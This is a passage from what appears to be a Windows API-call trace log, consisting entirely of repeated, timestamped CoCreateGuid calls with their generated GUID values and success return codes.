Data3=0x4f4b, Data4=([0]=0x9c, [1]=0xea, [2]=0xae, [3]=0xdf, [4]=0xcd, [5]=0xf8, [6]=0x6d, [7]=0x49))) returned 0x0 [0248.891] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xca91a06c, Data2=0xad8b, Data3=0x4794, Data4=([0]=0xab, [1]=0xc5, [2]=0xd8, [3]=0x7f, [4]=0x2f, [5]=0xce, [6]=0x83, [7]=0xf6))) returned 0x0 [0248.892] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xc92cd, Data2=0xd565, Data3=0x4480, Data4=([0]=0xad, [1]=0x60, [2]=0x98, [3]=0xb8, [4]=0x7c, [5]=0xb0, [6]=0x7d, [7]=0x71))) returned 0x0 [0248.892] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x9f81fef7, Data2=0xa1c2, Data3=0x416c, Data4=([0]=0x9c, [1]=0x79, [2]=0x5d, [3]=0x3b, [4]=0x48, [5]=0x58, [6]=0x87, [7]=0xfb))) returned 0x0 [0248.893] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xa1622734, Data2=0xc8aa, Data3=0x48cb, Data4=([0]=0xb0, [1]=0x50, [2]=0xab, [3]=0x20, [4]=0x87, [5]=0x30, [6]=0x11, [7]=0xbe))) returned 0x0 [0248.893] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x66e46b5f, Data2=0xb9f8, Data3=0x4fde, Data4=([0]=0x95, [1]=0xb4, [2]=0xf1, [3]=0xbb, [4]=0xaa, [5]=0xce, [6]=0x25, [7]=0x68))) returned 0x0 [0248.894] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x53010126, Data2=0x6186, Data3=0x41c0, Data4=([0]=0xae, [1]=0x99, [2]=0xdd, [3]=0x6e, [4]=0xaf, [5]=0x2f, [6]=0xc9, [7]=0x7d))) returned 0x0 [0248.894] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x4fa639ec, Data2=0x2b27, Data3=0x4e90, Data4=([0]=0x86, [1]=0x9c, [2]=0x4d, [3]=0xd7, [4]=0x42, [5]=0x6e, [6]=0x6a, [7]=0xc0))) returned 0x0 [0248.895] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x1fbba7fc, Data2=0x4c67, Data3=0x457a, Data4=([0]=0x89, [1]=0x17, [2]=0x9d, [3]=0xdc, [4]=0x7d, [5]=0x11, [6]=0x68, [7]=0x2b))) returned 0x0 [0248.895] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xeda3ba3e, Data2=0x9a81, Data3=0x4f69, Data4=([0]=0x8b, [1]=0x50, [2]=0xb9, [3]=0x60, [4]=0x15, [5]=0xd3, [6]=0xf5, [7]=0xb4))) returned 0x0 [0248.896] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x84bb6df9, Data2=0x9434, Data3=0x47ef, Data4=([0]=0x85, [1]=0xf5, [2]=0xdc, [3]=0xa2, [4]=0xd1, [5]=0x55, [6]=0xf8, [7]=0x5))) returned 0x0 [0248.896] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xd5fd7e31, Data2=0x2e9a, Data3=0x43e1, Data4=([0]=0xad, [1]=0xce, [2]=0xaa, [3]=0x75, [4]=0xbf, [5]=0xe4, [6]=0x34, [7]=0xdb))) returned 0x0 [0248.897] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x2d839eda, Data2=0x7e8d, Data3=0x4c84, Data4=([0]=0xba, [1]=0x1c, [2]=0x38, [3]=0x99, [4]=0xb7, [5]=0x3e, [6]=0xbe, [7]=0xbf))) returned 0x0 [0248.898] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x63b211b8, Data2=0xd7ef, Data3=0x4de6, Data4=([0]=0x80, [1]=0x9b, [2]=0x9f, [3]=0x97, [4]=0x2c, [5]=0xd1, [6]=0x4f, [7]=0x88))) returned 0x0 [0248.898] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x356cfe37, Data2=0x361d, Data3=0x4ff9, Data4=([0]=0x9a, [1]=0x2b, [2]=0x7d, [3]=0x65, [4]=0xfa, [5]=0xdc, [6]=0x16, [7]=0x6b))) returned 0x0 [0248.899] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xa7902470, Data2=0x684e, Data3=0x431a, Data4=([0]=0xbc, [1]=0x49, [2]=0xd3, [3]=0x9a, [4]=0x71, [5]=0xfc, [6]=0xbf, [7]=0x5b))) returned 0x0 [0248.899] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xcf1014f4, Data2=0xcdb0, Data3=0x4da1, Data4=([0]=0x81, [1]=0x56, [2]=0x6e, [3]=0x79, [4]=0xd4, [5]=0x2d, [6]=0x54, [7]=0xb1))) returned 0x0 [0248.899] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xd393c4e7, Data2=0x4af6, Data3=0x4bfc, Data4=([0]=0x81, [1]=0x35, [2]=0xba, [3]=0x26, [4]=0xa0, [5]=0x80, [6]=0xc, [7]=0x1e))) returned 0x0 [0248.900] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xc93ef01, Data2=0x9174, Data3=0x48d5, Data4=([0]=0x94, [1]=0x78, [2]=0x5c, [3]=0xef, [4]=0xfa, [5]=0xbc, [6]=0xad, [7]=0xc0))) returned 0x0 [0248.900] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xe458a766, Data2=0xf00b, Data3=0x4b09, Data4=([0]=0x96, [1]=0x51, [2]=0xe3, [3]=0x38, [4]=0xb2, [5]=0x8f, [6]=0x78, [7]=0x26))) returned 0x0 [0248.901] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xa93d9d63, Data2=0xef11, Data3=0x431e, Data4=([0]=0x89, [1]=0xd1, [2]=0xdd, [3]=0x6b, [4]=0x22, [5]=0xba, [6]=0xc2, [7]=0xf6))) returned 0x0 [0248.901] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xbdd55462, Data2=0x930c, Data3=0x4996, Data4=([0]=0xa7, [1]=0x32, [2]=0x45, [3]=0x4b, [4]=0x6b, [5]=0x22, [6]=0xb2, [7]=0xe5))) returned 0x0 [0248.901] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xa4d1824a, Data2=0x698d, Data3=0x43dc, Data4=([0]=0xa9, [1]=0xef, [2]=0x3d, [3]=0xf1, [4]=0xc6, [5]=0x36, [6]=0x19, [7]=0x53))) returned 0x0 [0248.902] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x11dacb9, Data2=0xcf87, Data3=0x450f, Data4=([0]=0x9b, [1]=0x9e, [2]=0x12, [3]=0xd0, [4]=0x74, [5]=0xcd, [6]=0xb3, [7]=0x72))) returned 0x0 [0248.902] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x618d685c, Data2=0x9024, Data3=0x4459, Data4=([0]=0x86, [1]=0x4b, [2]=0x8c, [3]=0x61, [4]=0xbb, [5]=0xa, [6]=0xf6, [7]=0x33))) returned 0x0 [0248.903] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x3d7d748d, Data2=0x9d7c, Data3=0x412d, Data4=([0]=0x84, [1]=0xd7, [2]=0xf9, [3]=0xe, [4]=0xb9, [5]=0xc5, [6]=0x4e, [7]=0xfd))) returned 0x0 [0248.903] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xaf763ec2, Data2=0xd09b, Data3=0x49bd, Data4=([0]=0xbc, [1]=0x9c, [2]=0x1e, [3]=0xf1, [4]=0x4b, [5]=0x21, [6]=0xf6, [7]=0xb0))) returned 0x0 [0248.904] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xeb2083c4, Data2=0xb408, Data3=0x449c, Data4=([0]=0xb0, [1]=0x20, [2]=0x3f, [3]=0x46, [4]=0x67, [5]=0x91, [6]=0x79, [7]=0xe9))) returned 0x0 [0248.904] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xe1d1b31, Data2=0x541a, Data3=0x404c, Data4=([0]=0x8d, [1]=0x4c, [2]=0x43, [3]=0xaf, [4]=0x30, [5]=0x4a, [6]=0x42, [7]=0xbc))) returned 0x0 [0248.905] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x6382fe6a, Data2=0x5934, Data3=0x4527, Data4=([0]=0x89, [1]=0x7f, [2]=0xa0, [3]=0xa9, [4]=0x2a, [5]=0x45, [6]=0xfb, [7]=0xa1))) returned 0x0 [0248.905] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x138d6720, Data2=0xd085, Data3=0x455a, Data4=([0]=0x8f, [1]=0xd3, [2]=0x62, [3]=0xd8, [4]=0x28, [5]=0x22, [6]=0x7d, [7]=0xbb))) returned 0x0 [0248.905] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xa93390eb, Data2=0xc0c0, Data3=0x4074, Data4=([0]=0x8f, [1]=0x6c, [2]=0xed, [3]=0x8a, [4]=0x5d, [5]=0xcf, [6]=0xe9, [7]=0x85))) returned 0x0 [0248.906] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xd9ba5d29, Data2=0x971a, Data3=0x45b2, Data4=([0]=0xb8, [1]=0xf, [2]=0xdb, [3]=0xc5, [4]=0x60, [5]=0xbd, [6]=0x9d, [7]=0x5))) returned 0x0 [0248.906] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x44b7deb2, Data2=0x861d, Data3=0x4c77, Data4=([0]=0xb5, [1]=0x80, [2]=0xac, [3]=0x77, [4]=0xa, [5]=0x80, [6]=0xed, [7]=0x59))) returned 0x0 [0248.907] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xaf860ed5, Data2=0xa472, Data3=0x49b1, Data4=([0]=0x82, [1]=0x66, [2]=0x5b, [3]=0xc0, [4]=0x82, [5]=0xd0, [6]=0xb0, [7]=0x2c))) returned 0x0 [0248.907] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x93265656, Data2=0x1659, Data3=0x4c44, Data4=([0]=0x84, [1]=0xad, [2]=0x42, [3]=0xec, [4]=0xde, [5]=0x22, [6]=0x41, [7]=0xe1))) returned 0x0 [0248.908] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xc8970412, Data2=0x14b6, Data3=0x4f87, Data4=([0]=0xaf, [1]=0x84, [2]=0x59, [3]=0xb4, [4]=0x72, [5]=0x43, [6]=0xf0, [7]=0x8))) returned 0x0 [0248.908] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x216e0bce, Data2=0x97f, Data3=0x43fa, Data4=([0]=0x83, [1]=0xc4, [2]=0x30, [3]=0x67, [4]=0xf0, [5]=0x90, [6]=0x70, [7]=0x73))) returned 0x0 [0248.909] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x76a46ad8, Data2=0x1cec, Data3=0x4593, Data4=([0]=0xa5, [1]=0xef, [2]=0xf7, [3]=0xa5, [4]=0x7b, [5]=0x6a, [6]=0x37, [7]=0x93))) returned 0x0 [0248.909] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x6db80d7a, Data2=0x2f32, Data3=0x4488, Data4=([0]=0x8a, [1]=0x35, [2]=0x4e, [3]=0xdb, [4]=0x87, [5]=0x46, [6]=0xe0, [7]=0x68))) returned 0x0 [0248.910] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x3831a79b, Data2=0x38e2, Data3=0x4ad7, Data4=([0]=0xa8, [1]=0x37, [2]=0x31, [3]=0xc3, [4]=0x6e, [5]=0x5e, [6]=0xd3, [7]=0x24))) returned 0x0 [0248.911] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x8591996e, Data2=0x17c1, Data3=0x47c7, Data4=([0]=0xa5, [1]=0x2d, [2]=0x44, [3]=0x3b, [4]=0xc9, [5]=0xd8, [6]=0xc, [7]=0xc3))) returned 0x0 [0248.912] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xbc3603a3, Data2=0xdad2, Data3=0x4727, Data4=([0]=0xaf, [1]=0xe, [2]=0x1c, [3]=0xbb, [4]=0xca, [5]=0x26, [6]=0x8, [7]=0x6b))) returned 0x0 [0248.913] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xfaea0de0, Data2=0xa1e2, Data3=0x4c87, Data4=([0]=0xbf, [1]=0xcc, [2]=0x16, [3]=0x49, [4]=0x29, [5]=0x9f, [6]=0xd2, [7]=0x7))) returned 0x0 [0248.913] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xffe7737d, Data2=0x5c23, Data3=0x48f2, Data4=([0]=0x8c, [1]=0x99, [2]=0xd2, [3]=0x9c, [4]=0x74, [5]=0xc2, [6]=0xb8, [7]=0xd6))) returned 0x0 [0248.914] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x864114ff, Data2=0x5716, Data3=0x446e, Data4=([0]=0xb2, [1]=0x85, [2]=0x10, [3]=0xfe, [4]=0x54, [5]=0xa4, [6]=0x7a, [7]=0xa9))) returned 0x0 [0248.915] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xe7936abc, Data2=0x1a46, Data3=0x4763, Data4=([0]=0x8c, [1]=0x94, [2]=0x10, [3]=0x2b, [4]=0x61, [5]=0xef, [6]=0xbc, [7]=0x1e))) returned 0x0 [0248.915] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x6b7a9690, Data2=0x6505, Data3=0x4594, Data4=([0]=0x87, [1]=0x1d, [2]=0xc3, [3]=0xc2, [4]=0x81, [5]=0x6e, [6]=0x1c, [7]=0x60))) returned 0x0 [0248.916] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x85564f4b, Data2=0x2428, Data3=0x4b23, Data4=([0]=0xa7, [1]=0xd7, [2]=0x5f, [3]=0x20, [4]=0x7a, [5]=0xa0, [6]=0xce, [7]=0xa8))) returned 0x0 [0248.916] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x9c210927, Data2=0x2592, Data3=0x417e, Data4=([0]=0x9e, [1]=0xbb, [2]=0x2d, [3]=0x5c, [4]=0x38, [5]=0xc2, [6]=0x6f, [7]=0x92))) returned 0x0 [0248.917] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xc657c60, Data2=0x481d, Data3=0x4f37, Data4=([0]=0xad, [1]=0x43, [2]=0x8b, [3]=0x1, [4]=0x1d, [5]=0x9a, [6]=0x57, [7]=0xe3))) returned 0x0 [0248.918] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xea6770eb, Data2=0xbadb, Data3=0x4265, Data4=([0]=0xbe, [1]=0x60, [2]=0x25, [3]=0x1f, [4]=0x44, [5]=0x4, [6]=0xd, [7]=0xe1))) returned 0x0 [0248.918] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xeb6bddb7, Data2=0x614, Data3=0x4945, Data4=([0]=0x9e, [1]=0xab, [2]=0xd5, [3]=0xbb, [4]=0xa0, [5]=0x30, [6]=0x37, [7]=0xb4))) returned 0x0 [0248.919] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x6a3bd23e, Data2=0xea90, Data3=0x4dd3, Data4=([0]=0xa5, [1]=0xf8, [2]=0x93, [3]=0xea, [4]=0x90, [5]=0x8a, [6]=0xcd, [7]=0xf6))) returned 0x0 [0248.919] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x6ce80839, Data2=0xb83e, Data3=0x466e, Data4=([0]=0x96, [1]=0x21, [2]=0x51, [3]=0xdd, [4]=0x65, [5]=0x75, [6]=0xb9, [7]=0x8))) returned 0x0 [0248.920] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x465ce464, Data2=0xaf1a, Data3=0x4c95, Data4=([0]=0xac, [1]=0x29, [2]=0xff, [3]=0x43, [4]=0x43, [5]=0x5, [6]=0xcd, [7]=0xb8))) returned 0x0 [0248.920] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xdebfe767, Data2=0x9516, Data3=0x48d3, Data4=([0]=0xab, [1]=0x3b, [2]=0x6a, [3]=0xbd, [4]=0xf3, [5]=0x8f, [6]=0xc4, [7]=0xa0))) returned 0x0 [0248.921] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x9bf8a539, Data2=0xe3c8, Data3=0x4716, Data4=([0]=0x86, [1]=0xab, [2]=0x75, [3]=0x22, [4]=0xcf, [5]=0xad, [6]=0x58, [7]=0x63))) returned 0x0 [0248.921] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x6c8710e0, Data2=0xe037, Data3=0x44e1, Data4=([0]=0xb1, [1]=0x73, [2]=0xa5, [3]=0x3, [4]=0xa3, [5]=0x7d, [6]=0xe1, [7]=0xe7))) returned 0x0 [0248.922] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xd6b033fb, Data2=0x2d6b, Data3=0x4edc, Data4=([0]=0xb2, [1]=0x90, [2]=0xab, [3]=0xdc, [4]=0xc9, [5]=0x51, [6]=0x5, [7]=0x70))) returned 0x0 [0248.922] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x564bc542, Data2=0xed22, Data3=0x4a8a, Data4=([0]=0xb9, [1]=0xf7, [2]=0xd5, [3]=0xd9, [4]=0xe9, [5]=0xf2, [6]=0x9d, [7]=0xbc))) returned 0x0 [0248.923] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x38763f99, Data2=0xceb5, Data3=0x4a84, Data4=([0]=0xbd, [1]=0x84, [2]=0xfc, [3]=0x27, [4]=0x38, [5]=0x66, [6]=0x70, [7]=0x9f))) returned 0x0 [0248.924] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x56c2eb62, Data2=0xe8d1, Data3=0x42d1, Data4=([0]=0x9d, [1]=0x91, [2]=0xd0, [3]=0x48, [4]=0x7b, [5]=0x27, [6]=0x26, [7]=0x87))) returned 0x0 [0248.924] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xf0b1e08f, Data2=0xec49, Data3=0x4af1, Data4=([0]=0xa4, [1]=0xd5, [2]=0xda, [3]=0x1d, [4]=0xbd, [5]=0x69, [6]=0x80, [7]=0x13))) returned 0x0 [0249.109] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xbd588352, Data2=0x2537, Data3=0x48e8, Data4=([0]=0xbb, [1]=0x6e, [2]=0x2, [3]=0x2b, [4]=0x47, [5]=0x25, [6]=0xf2, [7]=0x6d))) returned 0x0 [0249.109] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xc0c39de1, Data2=0x6f03, Data3=0x483e, Data4=([0]=0xba, [1]=0x58, [2]=0xcd, [3]=0x11, [4]=0x19, [5]=0xbd, [6]=0x7, [7]=0x19))) returned 0x0 [0249.109] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x6feb878c, Data2=0x6ae8, Data3=0x45d1, Data4=([0]=0x95, [1]=0x2f, [2]=0xa0, [3]=0x8, [4]=0xaa, [5]=0xff, [6]=0x80, [7]=0x29))) returned 0x0 [0249.110] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x69e7962e, Data2=0xbdb7, Data3=0x4a44, Data4=([0]=0xba, [1]=0x7c, [2]=0xc6, [3]=0xa5, [4]=0xa6, [5]=0xe7, [6]=0x97, [7]=0xc4))) returned 0x0 [0249.110] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xa721e3ce, Data2=0xd655, Data3=0x4937, Data4=([0]=0xb5, [1]=0x6b, [2]=0x44, [3]=0x7c, [4]=0x7f, [5]=0x61, [6]=0xfc, [7]=0xd9))) returned 0x0 [0249.110] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x910e8526, Data2=0x723, Data3=0x4c9c, Data4=([0]=0x84, [1]=0x8, [2]=0xa1, [3]=0x1b, [4]=0xf9, [5]=0x85, [6]=0x56, [7]=0x1d))) returned 0x0 [0249.110] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x7f5ec162, Data2=0xc842, Data3=0x4062, Data4=([0]=0xa2, [1]=0xde, [2]=0x7a, [3]=0xc7, [4]=0x40, [5]=0x37, [6]=0xff, [7]=0x56))) returned 0x0 [0249.110] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x1b1681f2, Data2=0x3206, Data3=0x4df0, Data4=([0]=0xb9, [1]=0xd3, [2]=0x75, [3]=0x2, [4]=0x4b, [5]=0x9b, [6]=0x66, [7]=0x19))) returned 0x0 [0249.110] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xcd1921eb, Data2=0x4c36, Data3=0x4736, Data4=([0]=0x82, [1]=0x33, [2]=0x6b, [3]=0x92, [4]=0x63, [5]=0x7e, [6]=0xdf, [7]=0x10))) returned 0x0 [0249.111] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xb3b183d5, Data2=0xca7b, Data3=0x4187, Data4=([0]=0xaf, [1]=0xa, [2]=0x1, [3]=0xe7, [4]=0xe, [5]=0xa9, [6]=0xe0, [7]=0xcf))) returned 0x0 [0249.111] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xb8e8b2e7, Data2=0x8a90, Data3=0x4039, Data4=([0]=0x9c, [1]=0x1f, [2]=0x55, [3]=0x31, [4]=0x84, [5]=0x55, [6]=0x25, [7]=0xb3))) returned 0x0 [0249.112] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x530f662a, Data2=0xf299, Data3=0x4294, Data4=([0]=0x9e, [1]=0xf0, [2]=0x7e, [3]=0x25, [4]=0xe7, [5]=0xb7, [6]=0x72, [7]=0xc8))) returned 0x0 [0249.112] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x70ebc2c6, Data2=0xdda5, Data3=0x45c5, Data4=([0]=0xa4, [1]=0x26, [2]=0x7c, [3]=0xbb, [4]=0x2, [5]=0x66, [6]=0xa3, [7]=0xa7))) returned 0x0 [0249.112] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x9ce844ee, Data2=0xb99f, Data3=0x4609, Data4=([0]=0xa6, [1]=0xda, [2]=0xea, [3]=0x49, [4]=0xd2, [5]=0x41, [6]=0xca, [7]=0x2))) returned 0x0 [0249.112] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x1500a458, Data2=0xad07, Data3=0x41ac, Data4=([0]=0xa8, [1]=0x53, [2]=0xdd, [3]=0x6a, [4]=0x8a, [5]=0xfc, [6]=0xed, [7]=0x5e))) returned 0x0 [0249.112] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xf925f83e, Data2=0x5754, Data3=0x4a07, Data4=([0]=0xa2, [1]=0xe0, [2]=0xc7, [3]=0x54, [4]=0x16, [5]=0xdf, [6]=0xc2, [7]=0x1a))) returned 0x0 [0249.113] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xef4ecb2a, Data2=0x42d2, Data3=0x475c, Data4=([0]=0x85, [1]=0x8d, [2]=0xac, [3]=0x44, [4]=0xb0, [5]=0xf6, [6]=0x3e, [7]=0xb3))) returned 0x0 [0249.113] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x564fc2be, Data2=0xecc7, Data3=0x4ff6, Data4=([0]=0x81, [1]=0x2e, [2]=0x11, [3]=0x9, [4]=0x59, [5]=0x46, [6]=0x25, [7]=0x29))) returned 0x0 [0249.113] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x38090c5a, Data2=0xcba6, Data3=0x4533, Data4=([0]=0xb1, [1]=0x3b, [2]=0x1f, [3]=0xab, [4]=0x68, [5]=0x1b, [6]=0x4e, [7]=0x21))) returned 0x0 [0249.114] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xdf001ab7, Data2=0x6fad, Data3=0x47b1, Data4=([0]=0x96, [1]=0x61, [2]=0x83, [3]=0x16, [4]=0xda, [5]=0x3f, [6]=0xfc, [7]=0x2f))) returned 0x0 [0249.114] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x29747009, Data2=0xd8e2, Data3=0x401d, Data4=([0]=0xae, [1]=0x95, [2]=0x96, [3]=0x71, [4]=0xce, [5]=0xa9, [6]=0x7a, [7]=0x49))) returned 0x0 [0249.114] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xd9cdf30f, Data2=0x1ed1, Data3=0x4254, Data4=([0]=0x90, [1]=0x9d, [2]=0x98, [3]=0xe8, [4]=0xce, [5]=0x1, [6]=0x96, [7]=0x6b))) returned 0x0 [0249.115] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x7aacc1e6, Data2=0x2b8a, Data3=0x4c06, Data4=([0]=0x98, [1]=0x9f, [2]=0xfc, [3]=0x6d, [4]=0x12, [5]=0xda, [6]=0x4b, [7]=0xe8))) returned 0x0 [0249.115] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x953b8784, Data2=0x5360, Data3=0x4e5c, Data4=([0]=0x88, [1]=0x4c, [2]=0x8, [3]=0xcc, [4]=0x6f, [5]=0xf1, [6]=0x74, [7]=0x85))) returned 0x0 [0249.115] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xd878bbae, Data2=0x45fa, Data3=0x41a6, Data4=([0]=0xaa, [1]=0x95, [2]=0x3, [3]=0x53, [4]=0xfe, [5]=0x36, [6]=0xaa, [7]=0xae))) returned 0x0 [0249.116] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x5ea60158, Data2=0xd95b, Data3=0x47ff, Data4=([0]=0x88, [1]=0xc6, [2]=0x82, [3]=0x4a, [4]=0xb3, [5]=0x2e, [6]=0xcc, [7]=0x2c))) returned 0x0 [0249.116] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x63f7a119, Data2=0xcb4f, Data3=0x499e, Data4=([0]=0xb9, [1]=0x8b, [2]=0xc8, [3]=0xac, [4]=0xe7, [5]=0xf3, [6]=0xa7, [7]=0x49))) returned 0x0 [0249.117] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xc331e2cf, Data2=0xd417, Data3=0x4697, Data4=([0]=0xbd, [1]=0xe9, [2]=0xa9, [3]=0x11, [4]=0x6f, [5]=0x91, [6]=0xdc, [7]=0xb2))) returned 0x0 [0249.117] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xb46f2fc3, Data2=0xa0f7, Data3=0x4c91, Data4=([0]=0xb8, [1]=0xe5, [2]=0x8, [3]=0x5a, [4]=0xbd, [5]=0x23, [6]=0x19, [7]=0x73))) returned 0x0 [0249.117] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x34946076, Data2=0x872, Data3=0x47bc, Data4=([0]=0xb8, [1]=0x30, [2]=0x32, [3]=0x12, [4]=0x9a, [5]=0xc0, [6]=0x56, [7]=0xa5))) returned 0x0 [0249.118] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xb1be2b3c, Data2=0x8680, Data3=0x47c1, Data4=([0]=0x9e, [1]=0xf9, [2]=0xf5, [3]=0xc, [4]=0xcd, [5]=0x34, [6]=0x10, [7]=0xfc))) returned 0x0 [0249.118] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x56ec3729, Data2=0xc2e6, Data3=0x46d7, Data4=([0]=0x96, [1]=0x7f, [2]=0xe6, [3]=0xcb, [4]=0x82, [5]=0xa3, 